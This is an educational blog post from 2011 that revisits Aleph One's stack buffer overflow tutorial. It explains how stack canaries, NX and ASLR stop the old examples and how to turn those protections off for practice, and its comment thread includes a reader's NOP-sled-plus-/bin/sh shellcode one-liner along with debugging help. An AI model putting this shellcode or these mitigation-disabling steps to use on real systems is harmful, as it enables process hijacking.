Smashing the Stack in 2011

January 25, 2011

Recently, as part of ProfessorBrumley‘s Vulnerability, Defense Systems, and Malware Analysis class at Carnegie Mellon, I took another look at Aleph One (Elias Levy)’s Smashing the Stack for Fun and Profit article which had originally appeared in Phrack and on Bugtraq in November of 1996. Newcomers to exploit development are often still referred (and rightly so) to Aleph’s paper. Smashing the Stack was the first lucid tutorial on the topic of exploiting stack based buffer overflow vulnerabilities. Perhaps even more important was Smashing the Stack‘s ability to force the reader to think like an attacker. While the specifics mentioned in the paper apply only to stack based buffer overflows, the thought process that Aleph suggested to the reader is one that will yield success in any type of exploit development.

(Un)fortunately for today’s would be exploit developer, much has changed since 1996, and unless Aleph’s tutorial is carried out with additional instructions or on a particularly old machine, some of the exercises presented in Smashing the Stack will no longer work. There are a number of reasons for this, some incidental, some intentional. I attempt to enumerate the intentional hurdles here and provide instruction for overcoming some of the challenges that fifteen years of exploit defense research has presented to the attacker. An effort is made to maintain the tutorial feel of Aleph’s article.

Related Work

Craig J. Heffner wrote a similar article, which appeared on The Ethical Hacker Network in February of 2007. This article differs from Heffner’s by way of emphasis placed on exploit mitigations developed since 1996 and their effect on several excerpts from Smashing the Stack as well as their effect on several of Aleph’s examples. Also, several years have passed since Heffner’s article and another update couldn’t hurt.

Mariano Graziano and Andrea Cugliari wrote a much more formal paper, Smashing the stack in 2010, on the mitigations discussed here as well as their counterparts on Windows. From their abstract: “First of all we are going to analyze all the basical theoretical aspects behind the concept of Buffer Overflows…Subsequently the paper will analyze in detail all the aspects and mechanisms that regulate the way in which Buffer Overflow works on Linux and Windows architectures taking with particular care also the countermeasures introduced until nowadays for both the mentioned operating systems…we are going also to try some tricks to bypass these protections, in order to exploit the vulnerability even if a countermeasure has been adopted in the modern operating systems.” Regrettably, I had only become aware of their paper after I had published this post, and while Graziano/Cugliari’s paper and this blog post serve different purposes, my apologies to Graziano & Cugliari for failing to find their paper previously.

Introduction

Ubuntu has become a popular distribution for new Linux users as of late, so it’s probably not inappropriate to assume that budding security professionals interested in learning more about memory corruption exploitation have a certain likelihood to use the distribution. As such, all instructions presented here have been tested on Ubuntu 10.10 i386 desktop vanilla (no updates; the only additional required package is execstack) running within VMWare Workstation 7.1.3. Furthermore, Ubuntu provides a convenient table telling us what we’re up against. While these instructions have been tested on Ubuntu 10.10, their specifics should not vary greatly between distributions. Google is your friend.

My intention is for the reader to have this article open in one tab and Smashing the Stack open in another. Much of what Aleph explains has not changed since 1996 (e.g. the x86 ABI), so it would make little sense to repeat him here. Rather, I will pick and choose excerpts & examples that have become antiquated in some way, explain how they have been rendered so and what we can do to complete Aleph’s tutorial. Changes to gcc that have nothing to do with exploit mitigations are glossed over.

Let’s begin.

Dynamic Buffers

Dynamic variables are allocated at run time on the stack…We will concern ourselves only with the overflow of dynamic buffers, otherwise known as stack-based buffer overflows.

Aleph implies that an exploit author’s interest in dynamic buffers is limited to those found on the stack. Since 1996, much work has been completed on the topic of exploiting heap-based dynamic buffers as well, making such an implication antiquated. The distinction between the types of allocations is commonly made by CS majors by referring to stack locals as automatic, while reserving the word dynamic for heap allocations.

Matt Conover and the w00w00 Security Team authored the seminal paper on the topic of heap-based buffer overflow exploitation in January of 1999.

Use of the EBP/RBP Registers

Consequently, many compilers use a second register, FP, for referencing both local variables and parameters because their distances from FP do not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this purpose.

It’s worth noting that on the AMD64/x86-64 architecture, 64bit OSes typically do not treat EBP (RBP is the equivalent 64bit register on the AMD64 architecture) as a special purpose register, as is common on x86 architectures. This is one of many reasons why attempting Smashing the Stack on a AMD64 OS would make little sense.

Instead, [R|E]BP may be used as a general purpose register. It should be noted (thank you, Prof Brumley!) that while it is convention to treat EBP as a pointer to a stack frame on x86 systems, there is nothing that forces a developer to treat the register as such. That being said, if you’re developing for x86 Linux/Windows/OS X/etc and don’t use EBP according to convention, then you may run into trouble. I can’t think of any specific examples, but you’ve been warned.

Why mention this? EBP on x86 is treated as a control element – it points to the location of the previous stack frame. Controlling this value would be beneficial for an attacker (see: return oriented programming). Knowing the difference in convention between x86 and AMD64 architectures is therefore interesting to an attacker.

NX

Our code modifies itself, but most operating system (sic) mark code pages read-only. To get around this restriction we must place the code we wish to execute in the stack or data segment, and transfer control to it. To do so we will place our code in a global array in the data segment.

This is where the past fifteen years offers us something exciting. On recent x86 architectures (Pentium 4+), operating systems and compilers, Intel’s eXecute Disable Bit (referred to as NX by Linux, as DEP or NX by Windows, and as Enhanced Virus Protection* by AMD) renders the above statement misleading. Jumping to the .data segment as Aleph suggests on a modern system would more than likely cause an segmentation fault, since a data segment should not legitimately contain executable code and will more than likely be stored in a page that has the NX bit set.

*That’s a terrible name.

Think of the idea as akin to POSIX permissions: different users/groups have different R(ead), W(rite) and (e)X(ecute) permissions on different files. In 1996, x86 architectures only had the concept of R(ead) and W(rite) on memory pages. If something was R(eadable), then it was also (e)X(ecutable). Pentium 4 introduced hardware support for explicitly specifying whether a particular page should be (e)X(ecutable), hence NX.

Disabling NX mitigations varies with operating system and compiler; a gcc 4.4.5 / Ubuntu 10.10 method will be seen later in the examples.

Stack Protection & example2.c

This… program has a function with a typical buffer overflow coding error. The function copies a supplied string without bounds checking by using strcpy() instead of strncpy(). If you run this program you will get a segmentation violation.

The intent of this example is to crash the process by clobbering the return address, causing the process to attempt to return to 0x41414141 (‘AAAA’). The process certainly still crashes, but not for the same reason. Let’s look at the output generated by executing example2.c:

What happened here? Recent versions of gcc include the capability to build a mechanism for stack buffer protection into compiled programs. This capability is called ProPolice, and according to Wikipedia, it’s been largely unchanged since gcc 4.1 (Ubuntu 10.10 ships with gcc 4.4.5). A ProPolice patch is available for gcc 3.x versions and was added to the trunk in 4.x releases. The concept of the stack canary was originally proposed by Crispin Cowan in 1997 as StackGuard. The interested reader is referred to the Wikipedia entry.

OK, what does ProPolice/StackGuard/etc do?

The basic idea is to place a chosen or psuedo-random value between a stack frame’s data elements (e.g. char * buffers) and its control elements (e.g. RET address, stored EBP) that is either difficult for an attacker to replace during an attack or impossible for an attacker to predict. Before the function whose frame has been clobbered is allowed to return, this canary is checked against a known good. If that check fails, the process terminates, since it now considers its execution path to be in an untrusted state. “Canary” is used to describe this inserted value as a homage to the old practice of keeping canaries (the birds) in mines as a way to determine when the mine’s atmosphere becomes toxic (the canaries die before the toxicity level reaches a point that is dangerous for humans).

example3.c

This example is uninteresting from an exploit mitigation standpoint. Stack protection will not need to be disabled, since we are directly modifying the RET address, rather than overflowing to it. NX is irrelevant since we’re still returning into an eXecutable code segment. ASLR (discussed later) is also irrelevant since we do not require knowledge of an absolute memory address. Instead, example3 adds a static amount to the return address location.

This example does not work (it still prints ‘1’) on Ubuntu 10.10, but because this is due to factors that have nothing to do with exploit mitigations, I refer the reader to Craig Heffner’s article referenced earlier.

ProPolice, NX & overflow1.c

We have the shellcode. We know it must be part of the string which we’ll use to overflow the buffer. We know we must point the return address back into the buffer.

True in 1996, not so much in 2011. As with many modern OSes, Ubuntu 10.10 executables as NX-compatible by default. This is, of course, in addition to the default gcc 4.4.5 behavior of adding stack protection during compilation. In order to get this example to work, we’re going to need to disable a couple of exploit mitigations.

Odd. It didn’t crash, but it also didn’t spawn a new shell. It turns out that this is due to gcc allocating far more stack space in recent versions than the gcc that Aleph was working with. Again, this isn’t directly relevant to exploit mitigations, so I’m going to gloss over the reasoning behind this.

We need to modify overflow1.c in order to account for large amount of stack space allocated by our gcc 4.4.5:

execstack is a very simple program that modifies ELF headers to enable/disable NX protection on the stack in target binaries. Linux will respect the values placed in the ELF headers because it is not uncommon for an old binary to require an eXecutable stack. For a Windows equivalent discussion, take a look at ATL Thunk emulation (warning: PDF*; search “ATL thunk” within the document).

* An awesome PDF, that is.

ASLR & a Bunch of Examples

The problem we are faced when trying to overflow the buffer of another program is trying to figure out at what address the buffer (and thus our code) will be. The answer is that for every program the stack will start at the same address.

This is no longer true. Most modern desktop and server OSes rebase their stacks, code segments, dynamically loaded libraries and more in order to make a target address space unpredictable to an attacker. Address Space Layout Randomization (ASLR) is not particularly effective on the x86 architecture (warning: PDF) and enjoys a much larger amount of entropy on the AMD64 architecture. Regardless of the amount of bits available for pseudo-random rebasing, ASLR provides another hurdle for the attacker to overcome. Unless the target process is a daemon that spawns a separate process on each exploitation attempt and then silently ignores segmentation faults & exceptions, the lower amount of entropy available to x86 OSes is still going to prevent the attacker from conducting a successful exploit without a significant chance of a crash.

The inclusion of ASLR in Ubuntu 10.10 prevents us from gathering the type of results that 1996 would allow us to gather. In order to find a static stack pointer value (sp.c is deterministic, so the value shouldn’t change in the normal course of execution), we need to disable ASLR.

With ASLR disabled, we see results similar to Aleph’s description. A deterministic program like sp.c should, without ASLR, print the same location on every execution. Exploits often rely on the knowledge of where exactly something is mapped in target address space. ASLR removes this knowledge from a would-be attacker. The interested reader is referred to the randomize_va_space kernel patch for an explanation of possible values.

What does ASLR mean for exploit2.c as a primer to an attack on vulnerable.c? Well, you’re in for a lot more guessing. More importantly, any guess you choose will never be right, since the target space will be rebased on subsequent executions. Using such an exploitation strategy would require guessing many times, every time – something that is often not feasible against real world applications.

What about exploit3.c? In exploit3.c Aleph introduces a nopsled to his attack string. This will still help, because guessing within a range preceding the shellcode (or in more general terms: the payload) will still allow one to execute shellcode. The idea of a nopsled is tangential to the idea of ASLR. ASLR will still prevent exploit3.c from working reliably, albeit slightly more reliably than exploit2.c

OK, what about Aleph’s technique of storing shellcode in an environment value? Also affected by ASLR. The example presented in exploit4.c will also require a lot of guessing with no correct answer in the face of ASLR.

If you wish to complete these examples, my suggestion is just to disable ASLR via /proc as demonstrated previously.

Conclusion

I’ve attempted to enumerate the challenges that the past 15 years of exploit research defense as applicable to Aleph’s seminal paper, Smashing the Stack for Fun and Profit and give instruction on how one might go about following Aleph’s tutorial on a modern OS, with a specific nod to Ubuntu 10.10.

There is, however, a very good chance I missed something.

Corrections, suggestions, critiques are much appreciated. My hope is that this is helpful to some people; it certainly would have been helpful to me when I read Smashing the Stack for the first time.

Share this:

Like this:

Related

Great write up, and something many new exploiters will indeed encounter. We have similar information located on the SmashTheStack forums for how to do exploitation at home on modern systems. You can see it here: http://smashthestack.org/viewtopic.php?id=388

For those interested, SmashTheStack offers a variety of Wargames for shell based local exploitation challenges and exploit development. It’s a great way to take something like this and apply it to unknown challenges.

Rather than changing the size to 128 in overflow1.c, you should be changing the stack-boundary value during compilation. gcc allocates space for a variable as multiples of its stack-boundary value AFAIK. For the example in Aleph1’s paper to work out, you need to set the stack boundary to 4 using the

-mpreferred-stack-boundary=2

argument to gcc. Also if you wish to try out vulnerability development, id suggest you start out with something like DVL and then move onto Ubuntu later on.

@DVL: I completed Smashing the Stack on DVL (Damn Vulnerable Linux) 1.5 some years back, but it left me wondering why the examples would work on some intentionally insecure OS while they would fail to work on something that people might actually use. What is an OS that isn’t Damn Vulnerable doing to prevent such examples from working? Anyways, it just didn’t feel as if I had accomplished as much on DVL.

Let me know what you think about it. Finally notice that -just for the sake of clarity- I have written only the Windows part and the analyses of two real attacks while Andrea Cugliari – my classmate – the Linux part.
In order to have papers updated as much as possible about this topic take look at the awesome ax330d’s it-sec-catalog: https://code.google.com/p/it-sec-catalog/wiki/Exploitation

Happy hacking!

anon

February 27, 2011 at 8:48 am

The reason why sudo does no work to disable ASLR is that if you write

$ sudo echo 0 > /proc/sys/kernel/randomize_va_space

the shell (as unprivileged user) will attempt to open /proc/sys/kernel/randomize_va_space before executing “sudo”, which is logical because it has to redirect “sudo” output to it, so it fails.

But do you know the relationship between mprotect() system call and NX bit? For example, if I’m writing a program that would execute code in the stack, I can 1) call mprotect() to make the stack memory executable 2) go ahead do nothing while coding, but use execstack on the executable. Note I’m not writing an exploit. I call mprotect() when programing. Or you could imagine I somehow am implementing a return-to-lib attack and call mprotect() to make stack executable.

I changed the brk-fix-2.patch link, since kernel.org still says it’s undergoing maintenance. Were there any other broken links?

As for mprotect(), if you call mprotect(), either legitimately as the program author or illegitimately during a ROP sequence, and pass PROT_EXEC as part of the bitwise OR for page permissions, then mprotect() will cause the X bit to be set on the chosen page in vanilla scenarios. If the X bit is set on a page, then NX is not applicable; the page is executable so it doesn’t matter whether the processor is enforcing execution permissions.

Is it possible that disabling ASLR with kernel.randomize_va_space= 0 (from 1 default) can lead to eth0 network nic to stop working after a while ( specifically e1000 nic on Linux Centos 5.5 64 bit)
with a Cisco vpn nic hosted on top of that nic ?
thanks for any information

While I’m not familiar with your particular situation, I can answer in general terms.

In general, ASLR is designed to break things. Good ASLR implementations break exploitation attempts and have no adverse effects (aside from overhead) on normal execution flows. Enabling ASLR carries with it the potential to break things; disabling ASLR should never break things. Put simply, ASLR rebases position independent code in virtual memory at random deltas, usually aligned to page boundaries. The amount of entropy that defines this randomness is the ASLR implementation’s potency.

Therefore, to say that code requires ASLR to function properly, as you describe, is essentially saying that the code in question relies on its inability to predetermine address space layout. I can’t imagine a non-contrived scenario in which code would rely on such information denial. The opposite is frequently true – even today, much code relies on the absence of ASLR to function properly because it makes assumptions about the address space layout that are violated by the introduction of ASLR. Put another way, if something works with ASLR enabled, but not with it disabled, I would expect it to actually work only 1/2^(number of entropy bits) fraction of the time (And perhaps fail silently the vast majority of the time), and fail always with ASLR disabled. In such a scenario, a random offset choice by ASLR happens to fix a bad assumption in code regarding the address space layout.

A quick Google search for your problem yielded this: http://www.linuxquestions.org/questions/debian-26/kernel-randomize_va_space-changes-led-to-dead-eth0-602325/. If what the poster was assuming is correct, this might serve as a pretty relevant example of code that requires ASLR to be off – the opposite of what you’re describing. Perhaps the problem you are experiencing isn’t due to ASLR’s nature, but instead due to a misconfiguration triggered by the disabling of ASLR, similar to what might be happening to the person in the aforementioned post.

Hope that helps.

moshedayan

January 3, 2012 at 1:55 pm

Probably what is going on is that disabling ASLR exposes or makes emerge previously silent misconfigurations, which I did indeed discover, similarly to that post you mentioned. I have another doubt regarding ASLR, is it conceivable it could slow down a Linux guest hosted on Vmware ESX, that I am aware of, Vmware should translate all code into executable code, replacing special o.s. privileged instructions only (memory management mainly from what I understood), so basically I am not so interested in initial translation to virtual machine format slow down, rather if in run time habitual memory intensive there may be any penalty incurred from the random ASLR operations, like accessing memory in a shared library, would it perhaps slow things down. Thanks for any informations.

curious

January 5, 2012 at 8:44 pm

I want to exploit a stack based buffer overflow for education purposes.There is a typical function called with a parameter from main which is given as input from the program and a local buffer where the parameter is saved.Given an input such that nops+shellcode+address_shellcode i will exploit it.After debugging with gdb i found the address of the shellcode as it will pass as a parameter and right after the strcpy i examine the stack and the $ebp+8 which is the return address has succefully overwriten with the address of the shellcode.So i have what i want.But when i stepped forward the execution i got:

->shellcode_address in ?? ()
and then

Cannot find bound of current function
The return address has the value that i want. Any ideas what is happening? Also when i execute it i got a segmentation fault and i have compile it with -g -fno-stack-protector

return 0;
}
I found out with gdb that if you overwrite 309 bytes then you will exactly overwrite the return address with the last 4 bytes of your input which is exactly what we want. So since the shell code is 45 bytes long we want sth like : \x90 x 260 . “shellcode” . 4bytes address (260+45+4=309)

To find the address of the first parameter of the function i run several times gdb with input a 309 bytes long string and the address was always the same: 0x5ffff648

So if i append an address(reverse order i.e:0xabcdefgh – > \xgh\xef\xcd\xab) which is higher where the parameter points to, the processor will fall in a NOP command, doing nothing until it reaches the shellcode I end up with this: r perl -e ‘print (“\x90″ x 260 . “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh” . “\x3e\xf8\xff\x5f”)’

If you are successful in redirecting execution to your chosen address, then you should expect to be executing outside the bounds of any function for which gdb was provided symbols.

In your example, the vulnerable strcat() is overflowing a buffer on the stack, which allows you to overwrite a return address, presumably landing back onto the stack (since this this is where you’re putting your NOPs + shellcode).

Therefore, messages like:
->shellcode_address in ?? ()
… and …
Cannot find bound of current function
… should be expected. They are not an indication of a problem. There are no functions on the stack, so if you’re redirecting execution to the stack, then you should be outside of any function for which gdb has symbols.

Immediately before the segfault, check your addresses (e.g. “info registers” @ gdb prompt). Is the program counter (eip on x86) pointing on the stack? Is it pointing to your NOPs + shellcode? If you know your exploit is redirecting execution to the stack, then disable NX on the stack with execstack and try again.

curious

January 9, 2012 at 1:21 pm

Thanks for spending time responding at my “long” post,
In fact i examine the $eip just before the segfault and it has the address that i force the prog to jump to by overflowing the buffer.Then i examine this specific address that the $eip points to and it’s a nop instruction. So it should be the NX functionality

FG

February 1, 2012 at 3:20 pm

hmm this is very weird its taking 4032 bytes to get a segmentation fault any ideas why this might be occuring ?

Paul Makowski

I'm an MSISTM student at Carnegie Mellon's Information Networking Institute (INI). I enjoy breaking things more than building them; I use this blog to publish my successes at putting things back together.